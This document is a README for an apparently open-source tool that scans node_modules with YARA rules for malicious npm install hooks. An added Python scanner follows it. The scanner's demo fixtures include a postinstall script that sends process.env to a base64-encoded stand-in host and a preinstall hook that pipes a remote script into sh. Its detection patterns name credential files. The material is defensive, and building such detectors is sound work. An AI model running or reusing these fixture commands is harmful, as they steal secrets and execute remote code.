The purpose of this tool is to run a given set of YARA rules against a given node_modules folder. With this approach, we can define YARA rules that identify suspicious scripts injected into node packages, such as install-time hooks that fetch and execute remote code or collect environment variables and credentials. Mainly inspired by these articles: Malicious packages in npm; Malicious NPM packages target Amazon, Slack with new dependency attacks; Hunting malicious NPM packages. This package can be added to a CI/CD pipeline. Note that a YARA scan only flags patterns the rule set already describes, so it complements, rather than replaces, dependency vulnerability scanning and lockfile review.

Software requirements: Docker, Docker Compose, make (the repo ships a Makefile).

How to use: clone this repo, run the audit with the `make` command, and read the report from `artifacts/output.json`.
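To make concrete what a rule set aimed at node_modules looks for, here is an added example that is not part of the project's own code: a Python script that walks a node_modules tree, reads each package.json, and checks the npm install-time hooks (and any local .js file they run) against a handful of indicators of the kind the articles above describe. The project itself uses YARA for this; the indicators, package names, script bodies and the `run_demo` helper below are constructed for illustration so the logic runs offline without YARA installed.

```python
"""Heuristic scan of a node_modules tree for injected install-time scripts.

Added example, not code from the project described above. The project runs
YARA rules over node_modules; this script implements a few equivalent
indicators in Python so the detection logic can be read and run without YARA.
All package names and script bodies below are constructed for the demo.
"""
import json
import os
import re
import tempfile

# Lifecycle hooks npm runs automatically during `npm install`
# (prepare fires for git dependencies and local installs).
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicators seen in injected install scripts (heuristics, not proof of malice).
INDICATORS = {
    "remote_shell": re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sh|bash)\b"),
    "base64_decode": re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]\)|\batob\("),
    "dynamic_eval": re.compile(r"\beval\(|new Function\("),
    "reads_env": re.compile(r"process\.env\b"),
    "network": re.compile(r"https?://|require\(['\"]https?['\"]\)|\bfetch\(|\.request\("),
    "secret_files": re.compile(r"\.(npmrc|ssh|aws|bash_history)\b"),
}


def match_indicators(text):
    """Return the sorted list of indicator names that fire on `text`."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def severity(hits):
    """Pipe-to-shell, or env access combined with network use, is rated high."""
    if "remote_shell" in hits or {"reads_env", "network"} <= set(hits):
        return "high"
    return "medium" if hits else "none"


def is_package_root(dirpath):
    """True for node_modules/<name> and node_modules/@scope/<name>."""
    parent = os.path.dirname(dirpath)
    if os.path.basename(parent) == "node_modules":
        return True
    return (os.path.basename(parent).startswith("@")
            and os.path.basename(os.path.dirname(parent)) == "node_modules")


def scan_package(pkg_dir):
    """Findings for one package: one entry per install hook that trips an indicator."""
    findings = []
    try:
        with open(os.path.join(pkg_dir, "package.json"), encoding="utf-8") as fh:
            pkg = json.load(fh)
    except (OSError, ValueError):
        return findings  # unreadable or malformed manifest: nothing to report
    scripts = pkg.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        hits = set(match_indicators(cmd))
        # Also inspect local .js files the hook runs, e.g. "node setup.js".
        for m in re.finditer(r"\b([\w./-]+\.js)\b", cmd):
            path = os.path.join(pkg_dir, m.group(1))
            if os.path.isfile(path):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits |= set(match_indicators(fh.read()))
        if hits:
            hits = sorted(hits)
            findings.append({"package": pkg.get("name", os.path.basename(pkg_dir)),
                             "hook": hook, "command": cmd,
                             "indicators": hits, "severity": severity(hits)})
    return findings


def scan_node_modules(root):
    """Walk a node_modules tree (nested trees and @scopes included)."""
    report = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic order across filesystems
        if "package.json" in filenames and is_package_root(dirpath):
            report.extend(scan_package(dirpath))
    return sorted(report, key=lambda f: (f["package"], f["hook"]))


def build_demo_tree(base):
    """Constructed node_modules: one clean package and two trojaned ones."""
    nm = os.path.join(base, "node_modules")

    def write(rel, content):
        path = os.path.join(nm, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)

    write("demo-clean-lib/package.json", json.dumps(
        {"name": "demo-clean-lib", "version": "1.0.0", "scripts": {"test": "node test.js"}}))
    # postinstall runs a local file that decodes a base64 host and posts process.env to it
    write("@demo/build-helper/package.json", json.dumps(
        {"name": "@demo/build-helper", "version": "2.1.0",
         "scripts": {"postinstall": "node setup.js"}}))
    write("@demo/build-helper/setup.js",
          "const host = Buffer.from('aHR0cHM6Ly9leGFtcGxlLmludmFsaWQ=', 'base64').toString();\n"
          "require('https').request(host + '/c?d=' + JSON.stringify(process.env)).end();\n")
    # preinstall pipes a remote script straight into a shell
    write("demo-native-shim/package.json", json.dumps(
        {"name": "demo-native-shim", "version": "0.3.0",
         "scripts": {"preinstall": "curl -s https://example.invalid/x.sh | sh"}}))
    return nm


def run_demo():
    """Build the constructed tree in a temp dir, scan it, and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_node_modules(build_demo_tree(tmp))


if __name__ == "__main__":
    # Same shape of output the tool writes to artifacts/output.json: a JSON list of findings.
    print(json.dumps(run_demo(), indent=2))
```

Point `scan_node_modules` at a real `node_modules` directory to use it outside the demo. The clean package produces no entry; the two trojaned packages each produce one finding with the hook, the command and the indicators that fired, which is the same information a YARA rule set would surface through its rule names and matched strings.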